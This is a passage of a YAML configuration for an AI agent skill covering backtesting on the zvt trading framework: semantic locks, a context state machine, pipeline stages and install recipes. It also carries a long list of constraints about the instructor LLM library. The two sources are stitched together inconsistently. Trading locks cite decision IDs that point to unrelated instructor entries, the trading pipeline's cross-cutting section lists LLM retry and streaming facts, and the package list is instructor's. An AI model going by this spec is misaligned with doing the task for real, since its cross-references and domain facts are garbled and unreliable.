    - multi-hop
    data_domain: mixed
    negative_terms:
    - parallel
    - independent
    ambiguity_question: DAG = subqueries with dependencies; for independent parallel use UC-005 instead.
  - uc_id: UC-010
    name: OpenAI Batch API Offline Classification
    positive_terms:
    - batch processing
    - offline classification
    - cost reduction
    - OpenAI Batch API
    data_domain: mixed
    negative_terms:
    - real-time
    - low-latency
context_state_machine:
  states:
  - id: CA1_MEMORY_CHECKED
    entry: Task started
    exit: All memory queries attempted and recorded; memory_unavailable set if failed
    timeout: 30s — skip memory, mark memory_unavailable=true, proceed to CA2
  - id: CA2_GAPS_FILLED
    entry: CA1 complete
    exit: 'All FATAL-priority required inputs answered: target market (A-share/HK/US), data source, time range, strategy type'
    timeout: NOT skippable — FATAL inputs MUST be user-answered before proceeding
  - id: CA3_PATH_SELECTED
    entry: CA2 complete
    exit: intent_router matched single use case with confidence gap > 20% over next candidate, no data_domain ambiguity
    timeout: Trigger ambiguity_question for top-2 candidates, await user selection
  - id: CA4_EXECUTING
    entry: CA3 complete + user explicit confirmation received
    exit: All hard gates G1-Gn passed and output files written
    timeout: NOT skippable — user confirmation of execution path required
  enforcement: Code generation is PROHIBITED before CA4_EXECUTING. Any regression to earlier state MUST be announced to user.
    buy/sell ordering SL-01 check runs at CA4 entry.
spec_lock_registry:
  semantic_locks:
  - id: SL-01
    description: Execute sell orders before buy orders in every trading cycle
    locked_value: sell() called before buy() in each Trader.run() iteration
    violation_is: fatal
    source_bd_ids:
    - BD-018
  - id: SL-02
    description: Trading signals MUST use next-bar execution (no look-ahead)
    locked_value: due_timestamp = happen_timestamp + level.to_second()
    violation_is: fatal
    source_bd_ids:
    - BD-014
    - BD-025
  - id: SL-03
    description: Entity IDs MUST follow format entity_type_exchange_code
    locked_value: stock_sh_600000 | stockhk_hk_0700 | stockus_nasdaq_AAPL
    violation_is: fatal
    source_bd_ids: []
  - id: SL-04
    description: DataFrame index MUST be MultiIndex (entity_id, timestamp)
    locked_value: df.index.names == ['entity_id', 'timestamp']
    violation_is: fatal
    source_bd_ids: []
  - id: SL-05
    description: 'TradingSignal MUST have EXACTLY ONE of: position_pct, order_money, order_amount'
    locked_value: XOR enforcement in trading/__init__.py:68
    violation_is: fatal
    source_bd_ids: []
  - id: SL-06
    description: 'filter_result column semantics: True=BUY, False=SELL, None/NaN=NO ACTION'
    locked_value: factor.py:475 order_type_flag mapping
    violation_is: fatal
    source_bd_ids: []
  - id: SL-07
    description: Transformer MUST run BEFORE Accumulator in factor pipeline
    locked_value: 'compute_result(): transform at :403 before accumulator at :409'
    violation_is: fatal
    source_bd_ids: []
  - id: SL-08
    description: 'MACD parameters locked: fast=12, slow=26, signal=9'
    locked_value: factors/algorithm.py:30 macd(slow=26, fast=12, n=9)
    violation_is: fatal
    source_bd_ids:
    - BD-036
  - id: SL-09
    description: 'Default transaction costs: buy_cost=0.001, sell_cost=0.001, slippage=0.001'
    locked_value: sim_account.py:25 SimAccountService default costs
    violation_is: warning
    source_bd_ids:
    - BD-029
  - id: SL-10
    description: A-share equity trading is T+1 (no same-day close of buy positions)
    locked_value: sim_account.available_long filters by trading_t
    violation_is: fatal
    source_bd_ids: []
  - id: SL-11
    description: Recorder subclass MUST define provider AND data_schema class attributes
    locked_value: contract/recorder.py:71 Meta; register_schema decorator
    violation_is: fatal
    source_bd_ids: []
  - id: SL-12
    description: Factor result_df MUST contain either 'filter_result' OR 'score_result' column
    locked_value: result_df.columns.intersection({'filter_result', 'score_result'}) non-empty
    violation_is: fatal
    source_bd_ids: []
  implementation_hints:
  - id: IH-01
    hint: 'Use AdjustType enum exactly: qfq (pre-adjust), hfq (post-adjust), bfq (none) — contract/__init__.py:121'
  - id: IH-02
    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 28
    fatal_constraints_count: 4
    non_fatal_constraints_count: 43
    use_cases_count: 10
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 8 source groups: cross_cutting(8),
        llm_call(1), mode_selection(2), provider_patch(7), reask_loop(4), schema_generation(1), and 2 more.'
      key_decisions: 28 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-021
      type: missing
      summary: failed_attempts XML rendering has no truncation; max_retries=5 can quintuple prompt size and exceed context
        window
    - id: BD-022
      type: missing
      summary: from_openai mode validation uses Python assert; silently bypassed under `python -O`
    - id: BD-023
      type: missing
      summary: 4 of 20 supported providers (ollama / azure_openai / google / litellm) miss get_provider() substring table
        — fall to Provider.UNKNOWN
    - id: BD-024
      type: missing
      summary: Streaming Partial silently disables Pydantic validators — every interior yield is unverified
    - id: BD-025
      type: missing
      summary: _processing_models is module-level mutable set without thread lock — Partial self-recursion guard has race
        condition
    - id: BD-026
      type: missing
      summary: Pydantic v1 hits AttributeError on Partial paths despite no version pin in pyproject
    - id: BD-027
      type: missing
      summary: llm_validator default model is gpt-3.5-turbo but docstring says gpt-4o-mini (code/doc mismatch)
    - id: BD-028
      type: missing
      summary: Per-mode reask handler has ~450 lines of provider-specific chunk-parsing duplication (extract_json / extract_json_async)
    - id: BD-006
      type: B/BA
      summary: Tenacity retries on EVERY Exception (no retry= arg in initialize_retrying)
    - id: BD-003
      type: B
      summary: Default Mode for OpenAI = Mode.TOOLS; for Anthropic = Mode.ANTHROPIC_TOOLS
    - id: BD-008
      type: B
      summary: from_openai uses assert mode in {...} (5 base_urls); other 13 providers raise ModeError
    - id: BD-001
      type: B/BA
      summary: max_retries has three independent layers with different defaults and semantics
    - id: BD-009
      type: B/BA
      summary: get_provider() base_url substring table covers 16 of 20 supported providers
    - id: BD-013
      type: B
      summary: chat / completions / messages properties all return self (alias chain to single wrapped create)
    - id: BD-014
      type: B
      summary: AsyncInstructor.create auto-forwards Iterable[X] to create_iterable; sync Instructor.create does NOT
    - id: BD-015
      type: B/BA
      summary: 9 @abstractmethod live on BaseCache (2) and BatchProvider (7); the rest of the extension surface is dispatch-dict
        / factory-function based
    - id: BD-016
      type: B
      summary: validation_context kwarg deprecated → context kwarg; both passed raises ConfigurationError
    - id: BD-017
      type: B
      summary: apatch is deprecated; patch detects async via inspect.iscoroutinefunction
    - id: BD-004
      type: B/BA
      summary: Reask injects validation errors as tool_result (Anthropic) / role=tool (OpenAI) / role=user text (MD_JSON /
        JSON) — provider-native error channels
    - id: BD-005
      type: B
      summary: failed_attempts list is rendered into next prompt as jinja2 XML, no truncation
    - id: BD-007
      type: B/BA
      summary: Reask (prompt rewrite) ONLY fires on ValidationError / JSONDecodeError / InstructorValidationError — network/API
        errors retry without reask
    - id: BD-019
      type: B/BA
      summary: failed_attempts XML accumulation is unbounded with no truncation/summarization
    - id: BD-012
      type: B/BA
      summary: 4 MIME types whitelisted for Image (jpeg / png / gif / webp); SVG / HEIC / AVIF rejected
    - id: BD-010
      type: M/BA
      summary: Partial[Model] uses Pydantic v2 model_construct() to bypass validation during streaming
    - id: BD-011
      type: M
      summary: jiter partial_mode = "trailing-strings" (one of 4 jiter modes)
    - id: BD-018
      type: B/BA
      summary: PartialLiteralMixin is deprecated in code but stale doc still asks users to import it
    - id: BD-002
      type: B/BA
      summary: strict=True default for Pydantic validation
    - id: BD-020
      type: T/B
      summary: llm_validator default model is gpt-3.5-turbo (code) but docstring says gpt-4o-mini (mismatch — known bug)
resources:
  packages:
  - name: pydantic v2 (effective hard floor)
    version_pin: latest
  - name: tenacity
    version_pin: latest
  - name: jinja2 (sandboxed Environment)
    version_pin: latest
  - name: jiter (Rust JSON parser)
    version_pin: latest
  - name: spacy (NOT used — instructor has no NER)
    version_pin: latest
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install pydantic v2 (effective hard floor)
    - python3 -m pip install tenacity
    - python3 -m pip install jinja2 (sandboxed Environment)
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: instructor-C-001
    when: 'When deploying instructor with from_openai (or routes converging on it: OpenAI / OpenRouter / Anyscale / Together
      / Databricks) to production'
    action: run the Python interpreter with the -O optimization flag, because from_openai validates the (provider, mode) pair
      via Python assert statements that -O strips silently
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: Under python -O, the assert mode in {...} blocks in from_openai are removed; invalid (provider, mode) combinations
      reach the LLM call producing malformed kwargs, undefined provider responses, or silently wrong-shaped completions across
      5 OpenAI-family base_urls
    stage_ids:
    - mode_selection
    derived_from_bd_id: BD-G02
  - id: instructor-C-003
    when: When pointing instructor at self-hosted OpenAI-compatible endpoints (vLLM / TGI / Ollama / LiteLLM proxy) or providers
      whose base_url is not in the 16-substring table (azure_openai / google / litellm / ollama)
    action: rely on instructor's automatic mode validation, because get_provider() will return Provider.UNKNOWN — neither
      the from_openai assert blocks nor the raise ModeError branches fire, leaving the (provider, mode) pair entirely unchecked
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: Self-hosted endpoints fall to Provider.UNKNOWN; assert blocks dispatch on Provider enum values (OPENROUTER/ANYSCALE/TOGETHER/OPENAI/DATABRICKS)
      so all assertions silently pass, and provider-specific optimizations are skipped — debugging wrong-shaped responses
      requires reading the dispatch table source
    stage_ids:
    - mode_selection
    - provider_patch
    derived_from_bd_id: BD-G03
  - id: instructor-C-007
    when: When passing max_retries to instructor (especially via from_provider)
    action: 'treat max_retries as a single semantic — it appears at three independent code points with different defaults:
      patch.py default=1 (reask only), Instructor.create default=3 (reask only), and auto_client.py:180-185 transparently
      passes it to openai.OpenAI(max_retries=...) which is the SDK''s HTTP-level retry (network only) — a single max_retries=5
      to from_provider can yield 5 reasks × 5 SDK HTTP retries = 25 worst-case API calls'
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: Passing one max_retries through from_provider transparently amplifies into both instructor reask and SDK
      HTTP retry layers, producing up to N×N API calls; on rate-limited or pay-per-call providers this drains the cost budget
      and triggers vendor throttling cascades within a single user request
    stage_ids:
    - provider_patch
    - llm_call
    derived_from_bd_id: BD-001
  - id: instructor-C-012
    when: When streaming Partial[Model] is required AND field validators must enforce business rules (PII / financial / medical
      fields)
    action: 'add explicit per-frame validation in the consumer generator loop (e.g. `for partial in stream: try: Model.model_validate(partial.model_dump());
      except ValidationError: ...`) OR use non-streaming create() for the validator-gated path; do not rely on instructor''s
      automatic validation for partial yields'
    severity: fatal
    kind: operational_lesson
    modality: must
    consequence: Without per-frame validation, PII fields can stream to the UI in unredacted form during construction and
      only get redacted on the final frame; for HIPAA/GDPR/PCI-scoped data this is a disclosure incident even if the final
      state is correct
    stage_ids:
    - streaming_partial
  regular:
  - id: instructor-C-002
    when: When using instructor.from_openai or any factory routing through it (OpenAI / OpenRouter / Anyscale / Together /
      Databricks)
    action: 'explicitly validate the mode at user-code level via `if mode not in Mode.tool_modes() | Mode.json_modes(): raise
      ValueError(...)` before instantiating the client, as belt-and-suspenders protection against assert stripping under -O'
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Without an explicit user-side mode check, deployments that ever run python -O lose the only mode-validation
      guardrail; invalid modes silently produce malformed kwargs that may hit the LLM and waste API budget on unparseable
      completions
    stage_ids:
    - mode_selection
    derived_from_bd_id: BD-G02
  - id: instructor-C-004
    when: When using self-hosted OpenAI-compatible endpoints with instructor (vLLM / TGI / Ollama / LiteLLM proxy / azure_openai
      / google / litellm)
    action: explicitly pass mode= to from_provider or from_openai (e.g. mode=instructor.Mode.JSON) and validate the (provider,
      mode) pair in user code before client construction; never rely on default mode resolution because Provider.UNKNOWN bypasses
      every validation branch
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Default-routed self-hosted endpoints get neither assert nor raise ModeError checks; an unsupported mode silently
      produces malformed kwargs and wasted API calls until the LLM returns garbled output that fails downstream validation
    stage_ids:
    - mode_selection
    - provider_patch
    derived_from_bd_id: BD-G03
  - id: instructor-C-005
    when: When designing application-level retry logic on top of instructor
    action: treat instructor's max_retries as governing BOTH validation reasks (where the prompt is rewritten with failed_attempts
      XML) and tenacity-driven retries on every other Exception (network errors, rate limits, OpenAI APIError) — both arms
      re-enter the loop because Retrying() is initialized without a retry= argument and tenacity defaults to retry_if_exception_type(Exception)
    severity: high
    kind: domain_rule
    modality: must
    consequence: Believing 'instructor only retries validation errors' (a documented misconception) leads to double-stacking
      application-level retry around instructor; rate-limit storms and burst API costs follow when both layers retry the same
      network failure
    stage_ids:
    - llm_call
    - reask_loop
    derived_from_bd_id: BD-006
  - id: instructor-C-006
    when: When instructor is wrapped in application-level tenacity Retrying or external retry middleware
    action: set instructor max_retries to 1-2 and pass an explicit tenacity.Retrying(retry=retry_if_exception_type(OpenAIError
      | NetworkError), stop=stop_after_attempt(N)) to the create() call so that network retries happen at one layer only,
      preventing N×M API call multiplication
    severity: high
    kind: operational_lesson
    modality: should
    consequence: Without segregation, an OpenAIError can be retried by both instructor's tenacity loop and the application's
      outer retry, multiplying API calls and burning the rate-limit/cost budget within seconds; production incidents have
      been reported on the issue tracker for this pattern
    stage_ids:
    - llm_call
  - id: instructor-C-008
    when: When deploying instructor in production with explicit retry budget control
    action: construct the OpenAI/Anthropic SDK client with explicit max_retries=N_HTTP and call Instructor(...).create(max_retries=N_REASK)
      separately; budget total API calls = N_HTTP × N_REASK; never pass a single max_retries to from_provider in production
    severity: high
    kind: operational_lesson
    modality: must
    consequence: Without explicit per-layer separation, a 'safe-looking' max_retries=3 against from_provider on a strict-validator
      workload can issue 9 API calls per user request; production cost incidents have surfaced in the instructor issue tracker
      due to this exact pattern
    stage_ids:
    - provider_patch
    - llm_call
  - id: instructor-C-009
    when: When integrating instructor into a Python project
    action: pin pydantic>=2.0 in your application's pyproject.toml; instructor's Partial / PartialBase / function_calls validators
      use create_model + model_construct + model_fields + model_validate_json + TypeAdapter, all of which are Pydantic v2-only
      APIs without v1 fallback
    severity: high
    kind: resource_boundary
    modality: must
    consequence: Pydantic v1 codebases hit AttributeError on Partial paths far from the install site; reask paths silently
      passthrough because v2 BaseModel ignores @validator decorator; instructor's pyproject does NOT pin pydantic>=2.0, so
      v1 install succeeds but breaks at runtime
    stage_ids:
    - validation
    - streaming_partial
    derived_from_bd_id: BD-G06
  - id: instructor-C-010
    when: When migrating an application from Pydantic v1 to use instructor (which requires v2)
    action: globally replace @validator with @field_validator and @root_validator with @model_validator(mode='after'); audit
      every BaseModel subclass for v1-only Config inner classes and convert to model_config = ConfigDict(...); v1 decorators
      are silently ignored by v2 BaseModel (no warning) so missed conversions fail open
    severity: high
    kind: operational_lesson
    modality: must
    consequence: v1 @validator decorators are ignored by v2 BaseModel without warning; instructor's reask path receives no
      ValidationError because the legacy validator never ran, so malformed LLM output passes silently into business logic
    stage_ids:
    - validation
  - id: instructor-C-011
    when: When using instructor's create_partial / Partial[Model] streaming for fields that have field_validator / model_validator
      / Annotated validators
    action: assume Pydantic validators run on each yielded partial instance — Partial uses model_construct() which bypasses
      ALL validation; only the FINAL completed JSON triggers model_validate, leaving every interior yield unverified
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: UI consumers receive intermediate Partial frames that violate business rules (PII redaction validators, schema
      invariants, regex-gated fields) until the last frame triggers model_validate; especially dangerous for compliance-relevant
      fields where per-frame validation is needed but silently absent
    stage_ids:
    - streaming_partial
    derived_from_bd_id: BD-G04
  - id: instructor-C-013
    when: When configuring max_retries with strict Pydantic validators on long-completion workloads
    action: set instructor max_retries higher than 2 with strict validators because every reask appends a FailedAttempt record
      and InstructorError.__str__ jinja2-renders ALL prior failures as `<failed_attempts><generation number=N>...</generation>...</failed_attempts>`
      XML; prompt size grows linearly with retry count and can exceed the model context window
    severity: high
    kind: operational_lesson
    modality: should_not
    consequence: On long completions with strict validators, max_retries=5 may quintuple prompt size and surface as InstructorRetryException
      (not LengthError); users debugging see 'too many retries' rather than the underlying context-window overrun, wasting
      both diagnosis time and token budget
    stage_ids:
    - reask_loop
    derived_from_bd_id: BD-G01
  - id: instructor-C-014
    when: When high max_retries (>=3) is needed for legitimate reasons on long-completion workloads
    action: register a hook on completion:kwargs that truncates messages list (drop oldest failed_attempts entries before
      each retry) OR pass an explicit tenacity.Retrying with stop_after_delay(N_seconds) instead of stop_after_attempt(N),
      so total runtime is bounded even if prompt growth is not
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Without active truncation, instructor has no truncation flag, no summarization mode, and no per-FailedAttempt
      size cap; the only mitigation is hook-based message rewriting in user code or switching to time-bounded stop conditions
    stage_ids:
    - reask_loop
  - id: instructor-C-015
    when: When upgrading the underlying provider SDK (openai / anthropic / cohere / etc.) in a project using instructor
    action: pin the provider SDK version to within the range instructor's CHANGELOG declares tested; instructor.patch wraps
      client.chat.completions.create via @wraps(func) and silently drops new kwargs; SDK signature changes (e.g. openai 1.x
      → 2.x) can break the patch without raising
    severity: medium
    kind: resource_boundary
    modality: must
    consequence: Provider SDK upgrade may change create() signature; instructor's @wraps-based patch silently passes through
      unrecognized kwargs which the new SDK then rejects with cryptic TypeError far from the upgrade site, or worse silently
      ignores them and produces wrong-shaped responses
    stage_ids:
    - provider_patch
  - id: instructor-C-016
    when: When using instructor.validation.llm_validator without explicitly specifying the model argument
    action: explicitly pass model='gpt-4o-mini' (or your preferred model) to llm_validator(); the module-level default is
      'gpt-3.5-turbo' but the docstring documents 'gpt-4o-mini' — relying on default gives a quality drop the docs do not
      warn about
    severity: medium
    kind: operational_lesson
    modality: must
    consequence: Users following the docstring believe gpt-4o-mini-quality validation runs while actually getting gpt-3.5-turbo;
      field validation accuracy (PII detection / classification / fact-check) silently degrades, and the discrepancy is invisible
      until output quality is audited
    stage_ids:
    - validation
    derived_from_bd_id: BD-G07
  - id: instructor-C-017
    when: 'When using Partial[Model] with self-referential model definitions (e.g. Partial[TreeNode] where TreeNode has children:
      list[TreeNode]) in multi-threaded servers'
    action: instantiate Partial[X] for self-referential models concurrently from multiple threads, because the recursion-guard
      set _processing_models at module level in dsl/partial.py is mutated without threading.Lock — concurrent set add/discard
      can race, producing duplicate work or corrupted membership checks
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: Multi-threaded servers using Partial with self-referential models see intermittent failures (model class
      corruption, infinite recursion escapes the guard, or wrong field schemas); the race is hard to reproduce and harder
      to diagnose because the failure point is far from the Partial[X] instantiation site
    stage_ids:
    - streaming_partial
    derived_from_bd_id: BD-G05
  - id: instructor-C-018
    when: When a multi-threaded server uses Partial with self-referential models
    action: instantiate every Partial[X] eagerly at module-import or server-startup time before threads spawn (e.g. `_PARTIAL_TREE
      = Partial[TreeNode]` at module top), so the _processing_models set mutation completes single-threaded; then reuse the
      cached Partial classes from worker threads
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: Without eager instantiation, the first concurrent Partial[X] call from worker threads races on the module-level
      set; symptoms include random AttributeError on missing fields, recursion-depth errors, or two threads holding inconsistent
      versions of the same Partial class
    stage_ids:
    - streaming_partial
    derived_from_bd_id: BD-G05
  - id: instructor-C-019
    when: When adding a new provider's streaming support to instructor (or upgrading an existing provider's chunk format)
    action: edit instructor/dsl/partial.py:525-976 (extract_json + extract_json_async) to add the new per-provider chunk-format
      branch; there is no shared chunk-format abstraction and ~450 lines of provider-specific branches live in one monolithic
      function
    severity: low
    kind: architecture_guardrail
    modality: must
    consequence: 'High maintenance burden: any provider chunk format change (OpenAI tool_calls.delta, Anthropic delta.partial_json,
      Cohere event_type, Mistral chunk.data.choices, Vertex/Gemini function_call.args, Writer chunk replace, etc.) requires
      editing this single file; a missed branch silently drops chunks for the affected provider with no error'
    stage_ids:
    - streaming_partial
    derived_from_bd_id: BD-G08
  - id: instructor-C-020
    when: When calling Instructor.create with response_model and the LLM may emit type-coerced JSON (e.g. '42' for an int
      field)
    action: explicitly pass strict=False to Instructor.create when type coercion is acceptable for your domain; instructor
      defaults strict=True, which rejects Pydantic v2 type coercions and triggers reask round-trips for what may be tolerable
      model output
    severity: medium
    kind: operational_lesson
    modality: should
    consequence: strict=True default causes models that occasionally return '42' instead of 42 to trigger a full reask round-trip;
      on workloads where the LLM's coercion-prone behavior is tolerable, every such case wastes one or more reask API calls
      and inflates latency
    stage_ids:
    - validation
    derived_from_bd_id: BD-002
  - id: instructor-C-021
    when: When constructing an Instructor or AsyncInstructor without explicit mode= argument
    action: rely on the framework defaults only after confirming compatibility — OpenAI factories default to Mode.TOOLS, Anthropic
      factories default to Mode.ANTHROPIC_TOOLS; for models that lack tool-calling support these defaults silently fall back
      to JSON-mode behavior on the LLM side and produce malformed responses
    severity: high
    kind: domain_rule
    modality: must
    consequence: Default Mode.TOOLS / Mode.ANTHROPIC_TOOLS assume tool-calling support; using a model without tool-calling
      (older or fine-tuned models) under default mode produces responses that do not match the dispatch handler expectations,
      surfacing as ValidationError after the fact
    stage_ids:
    - mode_selection
    derived_from_bd_id: BD-003
  - id: instructor-C-022
    when: When configuring streaming partial JSON parsing with custom jiter modes
    action: use partial_mode='trailing-strings' (the instructor default at all 4 call sites in dsl/partial.py); other jiter
      modes (off / on / trailing-strings-and-arrays) produce structurally-ambiguous Pydantic instances that mis-validate on
      completion
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Switching to partial_mode='trailing-strings-and-arrays' tolerates mid-array truncation but the resulting
      partial JSON can be interpreted multiple ways by Pydantic, causing the same chunk to parse to different structures across
      runs and breaking deterministic UI rendering
    stage_ids:
    - streaming_partial
    derived_from_bd_id: BD-011
  - id: instructor-C-023
    when: When constructing instructor.Image inputs from user-uploaded files
    action: assume instructor accepts arbitrary image formats — VALID_MIME_TYPES is hard-coded to image/jpeg, image/png, image/gif,
      image/webp; SVG, HEIC (iPhone default), AVIF and other formats raise MultimodalError before any provider call
    severity: medium
    kind: claim_boundary
    modality: must_not
    consequence: iPhone-photo workflows commonly produce HEIC files; without client-side conversion to a supported MIME type,
      every upload raises MultimodalError at the schema_generation stage and the user-facing error is a stack trace rather
      than a clean 'unsupported format' message
    stage_ids:
    - schema_generation
    derived_from_bd_id: BD-012
  - id: instructor-C-024
    when: When porting code between sync Instructor and AsyncInstructor with response_model=Iterable[X]
    action: assume Instructor.create and AsyncInstructor.create handle Iterable[X] response_model identically — AsyncInstructor.create
      auto-forwards Iterable[X] to create_iterable; sync Instructor.create does NOT, returning an unconsumed generator that
      the caller must iterate explicitly
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: Sync caller passing Iterable[X] silently receives an unconsumed generator object; iterating over the wrong
      object yields no items because the LLM call hasn't actually run, masking the silent-empty failure as 'no records returned'
    stage_ids:
    - provider_patch
    derived_from_bd_id: BD-014
  - id: instructor-C-025
    when: When passing additional context for Pydantic validators (custom data needed at validate-time)
    action: use the context= kwarg, not the deprecated validation_context= kwarg; passing both raises ConfigurationError;
      passing only validation_context= triggers a DeprecationWarning and is silently aliased to context
    severity: medium
    kind: domain_rule
    modality: must
    consequence: Mixing both kwargs raises ConfigurationError at runtime; relying on validation_context= only triggers DeprecationWarning
      that may be missed in CI logs; future versions plan to remove validation_context entirely
    stage_ids:
    - provider_patch
    derived_from_bd_id: BD-016
  - id: instructor-C-026
    when: When wiring instructor as the async-side wrapper for an existing provider client
    action: use the deprecated instructor.apatch entry point; instructor.patch detects async via inspect.iscoroutinefunction
      and wires new_create_async or new_create_sync accordingly — apatch was removed as a separate API surface
    severity: low
    kind: architecture_guardrail
    modality: must_not
    consequence: Code calling instructor.apatch sees a deprecation warning today; in future versions removal of apatch causes
      ImportError; the canonical entry instructor.patch handles both sync and async via runtime detection
    stage_ids:
    - provider_patch
    derived_from_bd_id: BD-017
  - id: instructor-C-027
    when: When following the docs/concepts/partial.md instruction to import PartialLiteralMixin for Literal/Enum support in
      Partial[Model]
    action: import or subclass PartialLiteralMixin — it is deprecated in code (DeprecationWarning at partial.py:56-75); JsonCompleteness
      now handles Literal/Enum natively; the docs are stale and have not been updated
    severity: low
    kind: operational_lesson
    modality: must_not
    consequence: Following the stale doc produces working but DeprecationWarning-emitting code; PartialLiteralMixin will be
      removed in a future release, breaking codebases that follow the doc verbatim — runtime failure will be ImportError far
      from the original copy-paste
    stage_ids:
    - streaming_partial
    derived_from_bd_id: BD-018
  - id: instructor-C-028
    when: When passing timeout=N in kwargs to Instructor.create alongside max_retries
    action: treat the timeout kwarg as a TOTAL deadline across all retries — initialize_retrying composes stop_after_attempt(max_retries)
      | stop_after_delay(timeout) as OR; whichever fires first stops the loop; a 30-second timeout with 5 retries gives up
      at second 30 even if only 2 retries happened
    severity: high
    kind: domain_rule
    modality: must
    consequence: Believing timeout is per-attempt causes users to set timeout=30 with max_retries=5 expecting up to 150 seconds;
